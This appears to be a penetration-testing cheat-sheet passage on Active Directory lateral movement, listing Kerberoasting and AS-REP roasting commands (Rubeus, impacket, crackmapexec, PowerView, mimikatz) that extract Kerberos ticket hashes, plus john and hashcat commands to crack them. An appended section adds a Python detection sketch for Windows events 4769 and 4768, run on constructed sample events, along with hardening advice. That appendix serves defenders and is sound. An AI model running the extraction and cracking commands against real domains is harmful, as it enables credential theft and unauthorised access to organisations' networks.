5. Lateral movement
5.1. Kerberoasting
5.1.1. Identified SPNs
_Hash extraction_
Specific account
Rubeus.exe kerberoast /user:<user> /rc4opsec /outfile:hashes.txt
Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt
All accounts
#Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt
#From memory to disk
kerberos::list /export
_Cracking hashes_
john
john --wordlist=<wordlist path> hashes.txt
hashcat
hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>
5.1.2. Set SPN
Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}
5.2. ASREPRoast
_Obtaining hashes_
From a specific account
#ASREPRoast.ps1
Get-ASREPHash -UserName <USER> -Verbose
From all accounts
Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt
GetNPUsers
#with Creds
impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
#with users
impacket-GetNPUsers -request -dc-ip IP -usersfile users.txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt
_Cracking hashes_
john
john --wordlist=<wordlist path> hashes.txt
hashcat
hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>
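Added here as the defender's counterpart to the two techniques on this page (it is not part of the original cheat sheet): a Python sketch of how Kerberoasting and AS-REP roasting show up in a domain controller's Security log. Kerberoasting produces a burst of Event ID 4769 (service ticket requested) records from one account with Ticket Encryption Type 0x17 (RC4-HMAC, the etype behind hashcat mode 13100) against many different SPNs; AS-REP roasting produces Event ID 4768 (TGT requested) records with Pre-Authentication Type 0 and an RC4-encrypted reply (hashcat mode 18200). The event IDs, encryption type and pre-auth type values are real Windows audit fields; the flat-dict event layout, the key names, the sample events and the thresholds are constructed for this example.

```python
"""Detection sketch for Kerberoasting (4769 + RC4 burst) and AS-REP roasting
(4768 + no pre-auth + RC4). Events are modelled as flat dicts whose keys follow
the 4768/4769 event descriptions; the layout and data are constructed here."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype 23: the ticket encryption hashcat 13100 / 18200 crack

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4769, "Time": "2024-01-10T09:00:01", "Account": "alice@CORP.LOCAL",
     "ServiceName": "svc_sql", "EncType": "0x12"},          # AES ticket, benign
    {"EventID": 4769, "Time": "2024-01-10T09:00:05", "Account": "bob@CORP.LOCAL",
     "ServiceName": "svc_sql", "EncType": "0x17"},
    {"EventID": 4769, "Time": "2024-01-10T09:00:06", "Account": "bob@CORP.LOCAL",
     "ServiceName": "svc_http", "EncType": "0x17"},
    {"EventID": 4769, "Time": "2024-01-10T09:00:07", "Account": "bob@CORP.LOCAL",
     "ServiceName": "svc_backup", "EncType": "0x17"},
    {"EventID": 4769, "Time": "2024-01-10T09:00:07", "Account": "bob@CORP.LOCAL",
     "ServiceName": "WS01$", "EncType": "0x17"},            # machine account, ignored
    {"EventID": 4769, "Time": "2024-01-10T09:30:00", "Account": "carol@CORP.LOCAL",
     "ServiceName": "svc_legacy", "EncType": "0x17"},       # single RC4 request, below threshold
    {"EventID": 4768, "Time": "2024-01-10T09:01:00", "Account": "svc_backup@CORP.LOCAL",
     "PreAuthType": "0", "EncType": "0x17"},                # no pre-auth + RC4: roastable
    {"EventID": 4768, "Time": "2024-01-10T09:01:30", "Account": "alice@CORP.LOCAL",
     "PreAuthType": "2", "EncType": "0x12"},                # normal pre-authenticated logon
]


def _is_roastable_service(name):
    """Machine accounts (trailing $) and krbtgt are noise for Kerberoasting detection."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def detect_kerberoast(events, window=timedelta(minutes=5), min_spns=3):
    """Return {account: [services]} for accounts that obtained RC4 service tickets
    for at least min_spns distinct roastable services inside one time window."""
    requests = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4769 and e["EncType"].lower() == RC4_HMAC
                and _is_roastable_service(e["ServiceName"])):
            requests[e["Account"]].append(
                (datetime.fromisoformat(e["Time"]), e["ServiceName"]))
    findings = {}
    for account, reqs in requests.items():
        reqs.sort()
        # Slide a window from each request; flag on the first one dense enough.
        for start, _ in reqs:
            in_window = {svc for t, svc in reqs if start <= t <= start + window}
            if len(in_window) >= min_spns:
                findings[account] = sorted(in_window)
                break
    return findings


def detect_asrep_roast(events):
    """Return accounts whose TGT was issued without pre-authentication and whose
    AS-REP was RC4-encrypted, i.e. accounts exposed to AS-REP roasting."""
    return sorted({e["Account"] for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == "0"
                   and e["EncType"].lower() == RC4_HMAC})


if __name__ == "__main__":
    for account, services in detect_kerberoast(SAMPLE_EVENTS).items():
        print(f"Kerberoasting suspected: {account} -> {', '.join(services)}")
    for account in detect_asrep_roast(SAMPLE_EVENTS):
        print(f"AS-REP roastable account: {account}")
```

The 4768 rule doubles as an inventory check: every account it returns has "Do not require Kerberos preauthentication" set, which is the attribute to review. For the 4769 side, the threshold and window need tuning per environment, but a more durable fix is removing the RC4 surface altogether: service accounts with AES-only keys and long random passwords (or gMSAs) turn the hashes this page extracts into something the cracking commands above cannot recover.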